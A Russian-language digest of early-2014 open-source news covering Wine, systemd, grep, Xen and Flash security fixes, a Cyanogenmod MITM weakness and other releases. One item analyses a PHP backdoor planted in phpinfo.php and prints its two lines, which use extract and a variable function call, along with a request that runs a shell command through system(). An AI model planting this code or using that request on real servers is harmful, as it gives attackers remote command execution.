Организация Python Software Foundation ввела в строй новый сайт проекта — python.org, отличающийся полностью переработанной структурой и современным дизайном. Читать далее Введён в строй новый сайт python.org

Вышел очередной экспериментальный выпуск открытой реализации Win32 API — Wine 1.7.13. С момента выпуска версии 1.7.12 было закрыто 63 отчёта об ошибках. Наиболее важные изменения: Поддержка дополнительных интерфейсов Direct3D 10. Расширение возможностей планировщика запуска задач (Task Scheduler); Дополнительные заглушки для Windows Media Player; Улучшение генерации кода для архитектуры ARM; Более корректный вывод данных о размере памяти на платформе OS X; Решены проблемы с играми, использующими DirectX10/11 вызов dxgi.dll.CreateDXGIFactory1, например Deus Ex: Human Revolution, Alan Wake, AC III, NFS: Most Wanted, Civ V; Закрыты отчёты об ошибках, связанные с работой игр и приложений: Battlefield 2, The Master Genealogist, Warcraft III, Proteus … Читать далее Выпуск Wine 1.7.13

Компания Adobe выпустила внеплановое обновление Flash-плагина, в котором устранены три критические уязвимости (CVE-2014-0498, CVE-2014-0499, CVE-2014-0502), две из которых позволяют организовать выполнение кода злоумышленника при обработке специально оформленного контента. Среди проблем имеется 0-day уязвимость (CVE-2014-0502), для которой уже зафиксировано появление в сети вредоносного ПО, уже около недели поражающего системы пользователей. Вредоносное ПО распространялось со взломанных сайтов нескольких крупных институтов и фондов. Проблема исправлена в выпуске Adobe Flash Player 11.2.202.341 для Linux, а также в свежем обновлении к браузеру Google Chrome. Всем пользователям рекомендуется срочно установить обновление. Читать далее Обновление Adobe Flash Player с устранением 0-day уязвимости

После почти пяти месяцев разработки Леннарт Поттеринг (Lennart Poettering) представил релиз системного менеджера systemd 209, примечательный обеспечением полноценной поддержки kdbus, включением в состав нового компонента systemd-networkd для настройки параметров сети, большим числом новых опций и API. Новый выпуск ориентирован в первую очередь на наращивание функциональности и содержит большую порцию нового кода, поэтому он требует дополнительной стабилизации и не рекомендуется для включения в состав веток дистрибутивов с длительным временем поддержки. В ближайшее время с интервалом в несколько недель планируется выпустить несколько корректирующих выпусков, устраняющих выявленные проблемы. Systemd сочетает в себе функции системы инициализации, механизм для контроля за выполнением фоновых процессов, службу … Читать далее Релиз системного менеджера systemd 209

Компания Valve анонсировала новый выпуск клиента Steam для Linux. В новом выпуске обновлены Runtime-библиотеки. Для SteamOS добавлена возможность выбора микрофона для голосового чата, обеспечено автоматическое определение устройств вывода звука при первой загрузке (выбранное устройство можно изменить в настройках), в интерфейс первого запука SteamOS добавлены настройки для изменения яркости и типа развёртки. Общее число доступных в каталоге Steam игр для Linux доведено до 332, что более чем на сто игр больше, чем три месяца назад. Читать далее Новый выпуск клиента Steam для Linux

Разработчики проекта LXDE представили релиз файлового менеджера PCManFM 1.2.0 и связанной с ним библиотеки libfm. Изначально интерфейс PCManFM базируется на использовании GTK+, но библиотека абстрагирует выполнение основных операций и позволяет интегрировать функции PCManFM в сторонние приложения и создавать варианты файлового менеджера на базе других тулкитов. В частности, параллельно развивается порт PCManFM на базе Qt. Основные улучшения: Подготовка полноценного перевода интерфейса на русский язык; Расширен API libfm и проведена чистка устаревших вызовов; Обеспечена возможность использования разных настроек рабочего стола для разных мониторов; В меню «Edit» добавлена новая опция для помещения в буфер обмена путей к выделенным файлам и директориям; Прекращена поддержка … Читать далее Доступен файловый менеджер PCManFM 1.2, развиваемый проектом LXDE

Представлен первый тестовый выпуск нового десктоп-окружения Budgie Desktop, построенного поверх технологий GNOME. В рамках проекта развивается несколько написанных на языке Си надстроек, заменяющих GNOME Shell, апплеты и систему управления сеансами. Budgie не является форком GNOME и работает поверх штатных низкоуровневых компонентов и библиотек GNOME. При этом, связанные с интерфейсом пользователя компоненты в Budgie заменены на собственные реализации. Готовые пакеты подготовлены для Fedora 20, openSUSE 13.1 и Arch Linux. Код распространяется под лицензией GPLv2. Основу Budgie составляет панель, близкая по организации работы к классическим панелям рабочего стола. Все элементы панели являются апплетами, что позволяет гибко настраивать состав и заменять реализации основных … Читать далее Первый тестовый выпуск десктоп-окружения Budgie, основанного на технологиях GNOME

Опубликована одна из самых больших подборок простейших приложений, функции которых ограничены выводом текста «Hello World!». Варианты программы представлены для 113 языков программирования. Дополнение: более полная подборка. Читать далее Реализация программы Hello World на 113 языках программирования

Вышла новая версия YAGF, написанной с использованием Qt 4 графической оболочки для программ оптического распознавания текста Cuneiform и Tesseract. Программа позволяет через единый GUI-интерфейс управлять сканированием изображений, их предварительной обработкой и распознаванием большого числа отсканированных страниц. Главным новшеством выпуска является улучшенное качество распознавания плохо отсканированных страниц Читать далее Новая версия оболочки для распознавания текста YAGF 0.9.3

Компания Canonical официально представила первых производителей смартфонов на базе мобильной платформы Ubuntu Touch. Первые модели смартфонов будут выпущены компаниями BQ Mobile (Испания) и Meizu (Китай). При этом, обе компании будут продавать устройства по всему миру через организацию заказов в online, в том числе устройство можно будет заказать с сайта Ubuntu.com. Кроме того, в анонсе упоминается достижение соглашений с 16 крупными сотовыми операторами, среди которых Vodafone, EE, T-Mobile USA, Deutsche Telekom, Verizon, Telstra и Portugal Telecom, которые готовы продавать своим абонентам смартфоны с Ubuntu. Точная дата начала продаж и ориентировочная стоимость устройств будет объявлена 26 февраля на конференции Mobile World Congres. … Читать далее Официально представлены первые производители смартфонов на базе Ubuntu

Компания Яндекс представила Yandex.Kit, собственный вариант прошивки на базе платформы Android, отличающийся оптимизацией для русскоязычных пользователей и тесной интеграцией с сервисами компании (поиск, карта, почта, диск и т.п.). Вместо привязки с аккаунту Google в Yandex.Kit осуществляется привязка к аккаунту пользователя в Yandex, в качетсве каталога-магазина предустановлен Яндекс.Store (Google Play не поддерживается). Первые смартфоны с прошивкой Yandex.Kit будут выпущены компаниями Huawei и Explay, и поступят в продажу уже весной этого года. Наиболее интересным улучшением является переработанная адресная книга, в которой добавлены средства для определения неизвестного номера в справочнике организаций, поддержка поиска телефона по названию компании, гибкие средства поиска по разным формам … Читать далее Компания Яндекс подготовила собственную прошивку на базе платформы Android

В свете появления спекуляций в отношении привязки GNOME к специфичным возможностям Linux и принуждения к использованию systemd, Маттиас Класен (Matthias Clasen), лидер Fedore Desktop Team и участник GNOME Release Team, пояснил позицию проекта в области портирования на различные системы. Маттиас решительно отвергает, что GNOME не принимает во внимание вопрос переносимости. Маттиас признаёт, что GNOME в основном ориентируется при разработке на обеспечение работы на современных Linux-системах и стремится использовать технологии, которые лучше всего подходят для решения возникающих задач, что, в частности, и приводит к расширению поддержки сервисов systemd, многие из которых являются прямыми потомками ранее используемых механизмов, поставляемых с gnome-settings-daemon. Но, … Читать далее Позиция GNOME в отношении работы на платформах, отличных от Linux

Компания NVIDIA выпустила обновление проприетарного драйвера NVIDIA 331.49, относящегося к категории стабильных веток с длительным сроком поддержки. Драйвер доступен для Linux (ARM, x86, x86_64), FreeBSD (x86, x86_64) и Solaris (x86_64). В новой версии добавлена поддержка GPU GeForce GT 710 и GeForce 825M. В конфигурацию X-сервера добавлена опция «InbandStereoSignaling» для включения/выключения стереосигналов через DisplayPort. Добавлена экспериментальная поддержка визуализации ARGB GLX при одновременном включении композитного режима и Xinerama в X.Org xserver 1.15. Читать далее Выпуск проприетарного драйвера NVIDIA 331.49

Доступны корректирующие обновления свободного гипервизора Xen — 4.3.2 и 4.2.4, в которых отмечено устранение 14 и 23 уязвимостей, а также исправление порции ошибок, влияющих на стабильность работы. Большинство уязвимостей позволяют инициировать крах или зависание хост-системы из гостевого окружения. Тем не менее, среди уязвимостей имеются 4 проблемы, для которых не исключено повышение привилегий пользователя внутри гостевой системы, а также 3 проблемы, которые потенциально позволяют администратору гостевой системы получить доступ к окружению хост-системы. Читать далее Обновление Xen 4.3.2 и 4.2.4 с устранением уязвимостей

Исследователи безопасности обратили внимание на использование незашифрованного HTTP-соединения при проверке наличия обновлений и загрузке zip-файлов программой для установки обновлений для свободной Android-прошивки Cyanogenmod в сочетании с отсутствием верификации загруженных данных по цифровой подписи или контрольной сумме, отдельно получаемой из надёжных источников (контрольная сумма также передаётся по HTTP). Подобная недоработка позволяет организовать MITM-атаку по подмене загружаемого файла на одном из транзитных узлов, через который проходит трафик пользователя. В настоящее время разработчики Cyanogenmod уже обеспечили возможность ручной загрузки обновлений через HTTPS, но доступ к API при проверке обновлений по-прежнему производится через HTTP. В качестве примера атаки по установке подставного обновления, продемонстрирована возможность … Читать далее Система обновления Cyanogenmod подвержена совершению MITM-атак

Представлен новый выпуск популярной утилиты для организации поиска данных в текстовых файлах — GNU Grep 2.17. Наиболее существенным улучшением является проведение заметной оптимизации производительности. Кроме того, в выпуске grep 2.17 прекращена поддержка опции «—mmap», которая давно была переведена в категорию устаревших. При использовании многобайтовых локалей поиск без учёта регистра через «grep -i» по простому шаблону, не содержащему символов » и ‘[‘, теперь выполняется в десять раз быстрее. Поиск с учётом регистра (без опции «-i») для многобайтовых локалей в новом выпуске выполняется в семь раз быстрее при наличии в тексте большого числа совпадений. Читать далее В grep 2.17 кардинально увеличена скорость работы с многобайтовыми кодировками

В декабре группа немецких исследователей сообщила об успешном создании прототипа системы обмена данными между двумя ноутбуками при помощи звукового канала связи, организованного в неслышимом диапазоне частот. Реализация данной системы так и не была открыта, поэтому несколько энтузиастов добились проведения похожего эксперимента используя свободный пакет GNU Radio для цифровой обработки и генерации сигналов. Подготовленный в ходе работы набор патчей к GNU Radio и сценарий проведения эксперимента опубликованы на GitHub. Представленные наработки позволяют организовать TCP/IP туннель между двумя рядом стоящими ноутбуками, используя для передачи данных штатные микрофоны и громкоговорители ноутбуков. Для организации канала связи используется близкий к ультразвуковому диапазон частот, не слышимый … Читать далее Опубликован код для организации передачи данных между ноутбуками в ультразвуковом диапазоне

Объявлено о проведении новой акции «Humble Indie Bundle«, в рамках которой пользователь может получить комплект из 6 многоплатформенных игр в обмен на пожертвование проекту любой суммы. Распространяемые в рамках акции могут работать на платформах Mac OS X, Windows и Linux. В пакет входят следующие игры: Guacamelee! Gold Edition, Dust: An Elysian Tail, The Swapper, Giana Sisters: Twisted Dreams, Antichamber и Monaco: What’s Yours is Mine (две последние игры доступны только перечислившим от $3.84). На момент написания новости собрано уже около 100 тыс. долларов. Средний размер суммы взноса составил $3.84. Средний размер взноса пользователей Linux систем составил $5.29, Mac OS X … Читать далее Одиннадцатая акция Humble Indie Bundle по распространению комплекта игр

Разработчики файловых менеджеров столкнулись с появлением в Android 4.4 (KitKat) новых ограничений на доступ приложений, имеющих полномочия WRITE_EXTERNAL_STORAGE, к внешним накопителям. Отныне возможность полного доступа ограничена только первичным накопителем и не применима ко вторичным. Изменение касается только устройств с двойным хранилищем, в которых в роли первичного накопителя выступает встроенная Flash-память, а вторичного — SD-карта. С практической стороны, подобное ограничение не позволяет реализовать полный контроль над SD-картой, например, при использовании непривилегированного файлового менеджера невозможно удалить или записать произвольные данные на SD-карту. Системные приложения могут организовать запись на вторичные накопители при наличии полномочий WRITE_MEDIA_STORAGE, которые не выдаются для пользовательских программ, устанавливаемых из … Читать далее Google ограничил в Android доступ сторонних приложений к внешней SD-карте

Выявлен заслуживающий внимания PHP-бэкдор, активация которого производится без видимого обращения к таким функциям, как «eval», «exec», «system», «assert» и «preg_replace». Вместо явного указания eval и других сразу вызывающих подозрение функций, при установке бэкдора в файле phpinfo.php появляется несколько на первый взгляд неопасных строк: @extract ($_REQUEST); @die ($ctime($atime)); При более вдумчивом просмотре становится ясно, что при помощи функции extract осуществляется создание переменных на основании данных, переданных в составе запроса GET или POST. Конструкция $ctime($atime) по сути является вызовом функции, имя которой хранится в переменной $ctime. Сформировав запрос «/phpinfo.php?ctime=systematime=ls -la» получим вызов функции system() с аргументом «ls -la». Читать далее Необычный способ организации вызова PHP-бэкдора

По заявлению компании Dell, пользователь может лишиться гарантии на встроенные громкоговорители ноутбуков, если в системе установлен медиапроигрыватель VLC. Причиной подобного шага является наличие в VLC штатной возможности установки громкости, превышающего номинальный уровень. По мнению Dell, установка в VLC завышенного уровня звука может привести к выходу громкоговорителей из строя. Разработчики VLC исключают такую возможность и считают отказ гарантийного восстановления повреждённого громкоговорителя формальным поводом, так как для вывода звука в VLC используется штатный API, не позволяющий превысить номинальный уровень громкости, а усиление производится лишь на уровне декодирования, т.е. виртуально повышается громкость контента, закодированного с пониженным уровнем громкости. В качестве реальной причины называется … Читать далее Использование VLC может привести к потере гарантии на громкоговорители ноутбуков Dell